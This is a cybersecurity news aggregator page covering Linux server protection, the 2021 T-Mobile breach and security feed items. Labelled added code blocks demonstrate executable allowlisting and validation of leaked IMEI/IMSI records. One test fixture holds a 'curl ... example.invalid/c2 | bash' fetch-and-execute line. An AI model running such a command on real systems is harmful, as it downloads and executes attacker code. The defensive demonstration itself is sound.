Cyber security aggregate rss news

Cyber security aggregator - feeds history

How and why to prote ...

Business

Until recently, large swaths of the IT community were convinced that Linux machines didn’t need protection: that the system’s architecture was intrinsically close to invulnerable, that it held no interest for attackers, and that the very ideology of open-source code served as a kind of guarantee against unexpected, serious vulnerabilities. In recent years, however, even hard-headed infosec officers have come to realize that such statements have little basis in fact.

Threats to Linux servers

As long as cybercrime was focused solely on making money at end users’ expense, Linux servers were indeed relatively safe. But modern cybercriminals set their sights on business, with its potential for much bigger payouts, long ago, and that is where the various Linux builds have come under serious scrutiny. After all, a server is of strategic interest to any attacker regardless of purpose, be it espionage, sabotage, or ordinary ransomware distribution.

You don’t have to look far for examples. Last November, our experts found a modification of the RansomEXX Trojan that can encrypt data on Linux machines. Tailored for targeted attacks on specific organizations (the code and ransom note are customized for each new target), the Trojan was already in use at the time of discovery. DarkRadiation ransomware, detected this summer, is purpose-built for attacks on Red Hat/CentOS and Debian Linux, and it can stop all Docker containers on affected machines. The malware is written entirely as a Bash script and uses the Telegram messenger API to communicate with its C&C servers. Almost every modern APT group has backdoors, rootkits, or exploit code for Linux; our Global Research & Analysis Team (GReAT) has published a study of the latest APT tools targeting Linux machines.

Although the open-source community carefully studies distributions, collectively discusses vulnerabilities, and (most of the time) discloses them responsibly, administrators don’t always update their Linux servers. Many still figure, “if it ain’t broke, don’t fix it.” That philosophy prevails despite some vulnerabilities being quite serious. For example, CVE-2021-3560 in the polkit system service (installed by default in many Linux distributions), published in June 2021, can be used for local privilege escalation; it received a CVSS v3 base score of 7.8 out of 10. On a server missing that one patch, any attacker who already holds an unprivileged foothold can escalate to root.

How to secure Linux servers

Kaspersky Endpoint Security for Linux has long protected users from such problems. However, with the rising number of attacks on Linux servers, we decided to update our solution with a number of new technologies.

First, the solution now features full Application Control: a technology that runs only applications on a trusted list, or blocks those on an untrusted list. To help users configure this module, we added features to inventory executable programs and define custom categories. That provides highly effective protection against a very wide range of threats, because a newly dropped binary or script that is not on the trusted list does not execute at all, whether or not it matches a known malware signature.

Second, the time had come to strengthen the solution’s anti-ransomware capability (malware of this type is now detected by its behavior).

We are also aware that a significant share of Linux machines are cloud servers rather than physical machines in clients’ offices. Moreover, containerization makes it possible to run applications in containers, letting admins solve scalability issues, increase application stability, and use computing resources more efficiently. Therefore, we focused on scenarios for deploying the solution in public clouds and protecting containerization platforms (Docker, Podman, CRI-O, and runc). These cover both a threat detection mode for running containers, which lets technicians identify the particular containers containing threats and the paths to the malicious files inside them (in the runtime environment), and an on-demand service for checking container images, both local ones and those in repositories.

In the latter scenario, Kaspersky Endpoint Security for Linux can itself be launched inside a Docker container and used to scan other containers for threats through its RESTful API, which automates image scanning, for example as a stage in a CI/CD pipeline.

Users now have more than one option for managing the protection of servers and container workloads in public clouds such as Microsoft Azure, AWS, Google Cloud, and Yandex Cloud. The first is the console, whether in an in-house data center or in a public cloud. The second is the Kaspersky Security Center Cloud Console, deployed and supported by us, leaving the administrator free to focus on managing the protection of their infrastructure.

Kaspersky Endpoint Security for Linux is part of the Kaspersky Hybrid Cloud solutions suite. It integrates with the Kaspersky Managed Detection and Response service, which handles the particularly dangerous cyberthreats that can bypass automatic barriers.
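As an added illustration of the allowlisting idea behind Application Control (example code written for this page, not part of the original article or of Kaspersky's product), the Python below inventories executables under a directory tree, hashes them, and classifies each one against a trusted list and an untrusted list. The temporary directory, the four sample scripts and both hash lists are constructed inline for the demo; the `example.invalid` host in the "known bad" script is a reserved placeholder, not a real address.

```python
"""Added example (not Kaspersky's code): the core of an application-control
"trusted list". It inventories executables under a directory tree, hashes them,
and reports anything not on the allowlist, so a dropped script or binary is
flagged whether or not a signature exists for it."""
from __future__ import annotations

import hashlib
import os
import stat
import tempfile
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set


@dataclass(frozen=True)
class Executable:
    path: str
    sha256: str


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def inventory(root: str) -> List[Executable]:
    """Every regular file under root with any execute bit set, sorted by path.
    Symlinks are skipped (lstat) so a link pointing outside root cannot
    smuggle a foreign file into the inventory."""
    found: List[Executable] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & 0o111:
                found.append(Executable(p, sha256_of(p)))
    return sorted(found, key=lambda e: e.path)


def classify(items: Iterable[Executable], allow: Set[str], deny: Set[str]) -> Dict[str, List[str]]:
    """Default-deny verdicts keyed by content hash, not by path or file name:
    renaming a known-bad file changes nothing, and an unknown hash is blocked
    just like a known-bad one; it is only reported in its own bucket."""
    verdict: Dict[str, List[str]] = {"allowed": [], "denied": [], "unknown": []}
    for e in items:
        if e.sha256 in deny:
            verdict["denied"].append(e.path)
        elif e.sha256 in allow:
            verdict["allowed"].append(e.path)
        else:
            verdict["unknown"].append(e.path)
    return verdict


def demo() -> Dict[str, List[str]]:
    """Constructed scenario in a temp dir: one trusted backup script, one script
    whose hash is on the denylist, one never-seen script, one non-executable file."""
    with tempfile.TemporaryDirectory() as d:
        def write(name: str, data: bytes, mode: int) -> str:
            p = os.path.join(d, name)
            with open(p, "wb") as f:
                f.write(data)
            os.chmod(p, mode)
            return p

        trusted = write("backup.sh", b"#!/bin/sh\ntar czf /srv/backup.tgz /srv/data\n", 0o755)
        known_bad = write("update.sh", b"#!/bin/bash\ncurl -s https://example.invalid/c2 | bash\n", 0o755)
        write("cleanup.sh", b"#!/bin/bash\nopenssl enc -aes-256-cbc -in /srv/data/db -out /srv/data/db.enc\n", 0o755)
        write("notes.txt", b"not executable\n", 0o644)
        allow = {sha256_of(trusted)}
        deny = {sha256_of(known_bad)}
        verdict = classify(inventory(d), allow, deny)
        # Report base names so the result does not depend on the temp dir path.
        return {k: [os.path.basename(p) for p in v] for k, v in verdict.items()}


if __name__ == "__main__":
    print(demo())
```

In practice the allowlist is generated from a golden image and the inventory is run against the live root; at enforcement time the `unknown` bucket is treated exactly like `denied`, which is what makes a never-seen Bash ransomware dropper inert even before any detection signature exists for it.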

T-Mobile Investigati ...

Data Breaches

Communications giant T-Mobile said today it is investigating the extent of a breach that hackers claim has exposed sensitive personal data on 100 million T-Mobile USA customers, in many cases including the name, Social Security number, address, date of birth, phone number, security PINs and details that uniquely identify each customer’s mobile device.

On Sunday, Vice.com broke the news that someone was selling data on 100 million people, and that the data came from T-Mobile. In a statement published on its website today, the company confirmed it had suffered an intrusion involving “some T-Mobile data,” but said it was too soon in its investigation to know what was stolen and how many customers might be affected.

[Image: a sales thread tied to the allegedly stolen T-Mobile customer data.]

“We have determined that unauthorized access to some T-Mobile data occurred, however we have not yet determined that there is any personal customer data involved,” T-Mobile wrote. “We are confident that the entry point used to gain access has been closed, and we are continuing our deep technical review of the situation across our systems to identify the nature of any data that was illegally accessed,” the statement continued. “This investigation will take some time but we are working with the highest degree of urgency. Until we have completed this assessment we cannot confirm the reported number of records affected or the validity of statements made by others.”

The intrusion came to light on Twitter when the account @und0xxed started tweeting the details. Reached via direct message, Und0xxed said they were not involved in stealing the databases but were instead in charge of finding buyers for the stolen T-Mobile customer data.

Und0xxed said the hackers found an opening in T-Mobile’s wireless data network that allowed access to two of T-Mobile’s customer data centers. From there, the intruders were able to dump a number of customer databases totaling more than 100 gigabytes. They claim one of those databases holds the name, date of birth, SSN, driver’s license information, plaintext security PIN, address and phone number of 36 million T-Mobile customers in the United States, with records going back to the mid-1990s.

The hacker(s) claim the purloined data also includes IMSI and IMEI data for 36 million customers. These are unique numbers: the IMEI identifies the handset itself, and the IMSI identifies the SIM card that ties that customer’s device to a telephone number. Combined with a plaintext security PIN, one of the details a carrier uses to verify a caller before changing an account, they are the raw material for the SIM-swapping attacks described below.

“If you want to verify that I have access to the data/the data is real, just give me a T-Mobile number and I’ll run a lookup for you and return the IMEI and IMSI of the phone currently attached to the number and any other details,” @und0xxed said. “All T-Mobile USA prepaid and postpaid customers are affected; Sprint and the other telecoms that T-Mobile owns are unaffected.”

Other databases allegedly accessed by the intruders included one for prepaid accounts, which had far fewer details about customers. “Prepaid customers usually are just phone number and IMEI and IMSI,” Und0xxed said. “Also, the collection of databases includes historical entries, and many phone numbers have 10 or 20 IMEIs attached to them over the years, and the service dates are provided. There’s also a database that includes credit card numbers with six digits of the cards obfuscated.”

T-Mobile declined to comment beyond what the company said in its blog post today.

In 2015, a computer breach at big-three credit bureau Experian exposed the Social Security numbers and other data of 15 million people who had applied for financing from T-Mobile.

Like other mobile providers, T-Mobile is locked in a constant battle with scammers who target its own employees in SIM swapping attacks and other techniques to wrest control over employee accounts that can provide backdoor access to customer data. In at least one case, retail store employees were complicit in the account takeovers.

WHO HACKED T-MOBILE?

The Twitter profile for the account @Und0xxed includes a shout-out to @IntelSecrets, the Twitter account of a fairly elusive hacker who has also gone by the handles IRDev and V0rtex. Asked if @IntelSecrets was involved in the T-Mobile intrusion, @und0xxed confirmed that it was.

The IntelSecrets nicknames correspond to an individual who has claimed responsibility for modifying the source code of the Mirai “Internet of Things” botnet to create a variant known as “Satori,” and for supplying it to others who used it for criminal gain and were later caught and prosecuted, such as Kenny “NexusZeta” Schuchmann, who pleaded guilty in 2019 to operating the Satori botnet. Two other young men have been charged in connection with Satori, but not IntelSecrets.

How do we know all this about IntelSecrets/IRDev/V0rtex? That identity has acknowledged as much in a series of bizarre lawsuits filed by a person who claims their real name is John Erin Binns. The same Binns identity operates the website intelsecrets[.]su. On that site, Binns claims he fled to Germany and Turkey to evade prosecution in the Satori case, only to be kidnapped in Turkey and subjected to various forms of psychological and physical torture. According to Binns, the U.S. Central Intelligence Agency (CIA) falsely told its counterparts in Turkey that he was a supporter or member of the Islamic State (ISIS), a claim he says led to his alleged capture and torture by the Turks.

Since then, Binns has filed a flood of lawsuits naming various federal agencies, including the FBI, the CIA, and the U.S. Special Operations Command, demanding that the government turn over information collected about him and seeking restitution for his alleged kidnapping at the hands of the CIA.

Speaking to the researcher Alon Gal (@underthebreach), the hackers responsible for the T-Mobile intrusion said they did it to “retaliate against the US for the kidnapping and torture of John Erin Binns in Germany by the CIA and Turkish intelligence agents in 2019. We did it to harm US infrastructure.”
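Added example, not code from the KrebsOnSecurity story: the structural checks an analyst can run on a sample of a claimed telecom dump before taking it at face value. An IMEI carries a Luhn check digit, so corrupted or fabricated IMEIs fail cheaply; an IMSI has no check digit, but its leading mobile country code (MCC) must match the population the seller claims, here the United States. The three records, their phone numbers and identifiers are constructed for the demo and do not correspond to real subscribers; the US MCC list and the three-digit North American MNC convention are assumptions stated in the code.

```python
"""Added example (not from the article): structural validation of the IMEI and
IMSI values a leaked telecom record claims to carry."""
from __future__ import annotations

import re
from typing import Dict, List, Optional

# Assumption: MCCs assigned to the United States under ITU-T E.212. A dump sold
# as "all T-Mobile USA customers" should not be full of other countries' MCCs.
US_MCCS = {"310", "311", "312", "313", "314", "315", "316"}


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; the IMEI's 15th digit is its check digit."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def parse_imei(value: str) -> Optional[Dict[str, str]]:
    """IMEI = 8-digit TAC (device model) + 6-digit serial + Luhn check digit.
    Spaces and dashes are tolerated as separators; anything else fails."""
    v = re.sub(r"[\s-]", "", value or "")
    if not re.fullmatch(r"\d{15}", v) or not luhn_ok(v):
        return None
    return {"tac": v[:8], "serial": v[8:14], "check": v[14]}


def parse_imsi(value: str, mnc_len: int = 3) -> Optional[Dict[str, str]]:
    """IMSI = 3-digit MCC + MNC (3 digits in North America, 2 in most other
    regions) + MSIN, 15 digits at most. There is no check digit, so only the
    structure can be tested."""
    v = value or ""
    if not re.fullmatch(r"\d{6,15}", v):
        return None
    return {"mcc": v[:3], "mnc": v[3:3 + mnc_len], "msin": v[3 + mnc_len:]}


def triage(record: Dict[str, str]) -> Dict[str, object]:
    """Say what is structurally plausible about one record, and why not."""
    flags: List[str] = []
    imei = parse_imei(record.get("imei", ""))
    imsi = parse_imsi(record.get("imsi", ""))
    if imei is None:
        flags.append("imei: wrong length or failed Luhn check")
    if imsi is None:
        flags.append("imsi: not 6-15 digits")
    elif imsi["mcc"] not in US_MCCS:
        flags.append(f"imsi: MCC {imsi['mcc']} is not a US code")
    return {
        "phone": record.get("phone", ""),
        "imei_ok": imei is not None,
        "imsi_ok": imsi is not None and imsi["mcc"] in US_MCCS,
        "flags": flags,
    }


# Constructed records (not real customer data): one well-formed, one with a
# corrupted IMEI check digit, one whose IMSI carries a non-US MCC (262).
SAMPLE_RECORDS = [
    {"phone": "5550100001", "imei": "49-015420-323751-8", "imsi": "310260000000001"},
    {"phone": "5550100002", "imei": "490154203237519", "imsi": "310260000000002"},
    {"phone": "5550100003", "imei": "490154203237518", "imsi": "262010000000003"},
]


def triage_all(records=SAMPLE_RECORDS) -> List[Dict[str, object]]:
    return [triage(r) for r in records]


if __name__ == "__main__":
    for result in triage_all():
        print(result)
```

These checks establish only that a sample is internally consistent. A seller's live lookup offer, like the one quoted above, proves the same thing more directly, and neither is proof of provenance: a structurally valid IMEI and IMSI can be generated at will, so confirmation still has to come from the carrier matching sample rows against its own records.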

Connecting The Dots: The Kremlin’s Links to Cyber Crime

cybercrime

The question of whether or not Russia has been involved in ongoing cybercrime is on the minds of many. A new report by Analyst1 offers new intelligence on the matter. The post Connecting The Dots: The Kremlin’s Links to Cyber Crime appeared first on The Security Ledger with Paul F. Roberts.

Related Stories:
Episode 217: What Fighting Pirates Teaches Us About Ransomware
Episode 218: Denial of Sustenance Attacks - The Cyber Risk To Agriculture
Episode 222: US Rep. Himes on Congress’s About-face on Cybersecurity

 Trends, Reports, Analysis

The London High Court has ordered the cryptocurrency exchange Binance to attempt to identify and freeze accounts belonging to the attackers who allegedly stole about $2.6 million from Fetch.ai.

 Trends, Reports, Analysis

Research shows that the cost of phishing attacks has nearly quadrupled over the past six years: Large U.S. companies are now losing, on average, $14.8 million annually, or $1,500 per employee.

 Malware and Vulnerabilities

Red Hat gave the problem a Common Vulnerability Scoring System (CVSS) score of 7.5, which is "high": an attack using it would be easy to build and would require no privileges.

 Companies to Watch

Cisco announced on Friday that it has signed a deal to acquire observability company Epsagon. Cisco said the deal will play a key role in helping it ramp up its full-stack observability strategy.

 Companies to Watch

Baffle announced that it has raised $20 million in Series B funding led by new investor Celesta Capital, with contributions and follow-on investments from multiple investors.

 Laws, Policy, Regulations

The Federal Financial Institutions Examination Council (FFIEC) has issued updated security guidance advising banks to use stronger access controls and multifactor authentication.

 Feed

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.

 Feed

Red Hat Security Advisory 2021-3181-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include bypass and out of bounds write vulnerabilities.

 Feed

Red Hat Security Advisory 2021-3172-01 - EDK is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Issues addressed include a buffer overflow vulnerability.

 Feed

Red Hat Security Advisory 2021-3178-01 - The System Security Services Daemon service provides a set of daemons to manage access to remote directories and authentication mechanisms. It also provides the Name Service Switch and the Pluggable Authentication Modules interfaces toward the system, and a pluggable back-end system to connect to multiple different account sources. Issues addressed include a code execution vulnerability.

 Feed

Red Hat Security Advisory 2021-3177-01 - The cloud-init packages provide a set of init scripts for cloud instances. Cloud instances need special scripts to run during initialization to retrieve and install SSH keys, and to let the user run various scripts.

 Feed

Taiwanese chip designer Realtek is warning of four security vulnerabilities in three software development kits (SDKs) accompanying its WiFi modules, which are used in almost 200 IoT devices made by at least 65 vendors. The flaws, which affect Realtek SDK v2.x, Realtek "Jungle" SDK v3.0/v3.1/v3.2/v3.4.x/v3.4T/v3.4T-CT, and Realtek "Luna" SDK up to version 1.3.2, could be abused by attackers to

 Feed

A new social engineering-based malvertising campaign targeting Japan has been found to deliver a malicious application that deploys a banking trojan on compromised Windows machines to steal credentials associated with cryptocurrency accounts. The application masquerades as an animated porn game, a reward points application, or a video streaming application, Trend Micro researchers Jaromir

 Feed

The Incident Response (IR) services market is in accelerated growth due to the rise in cyberattacks that result in breaches. More and more organizations, across all sizes and verticals, choose to outsource IR to 3rd party service providers over handling security incidents in-house. Cynet is now launching a first-of-its-kind offering, enabling any Managed Security Provider (MSP) or Security

Aggregator history: Tuesday, August 17, 2021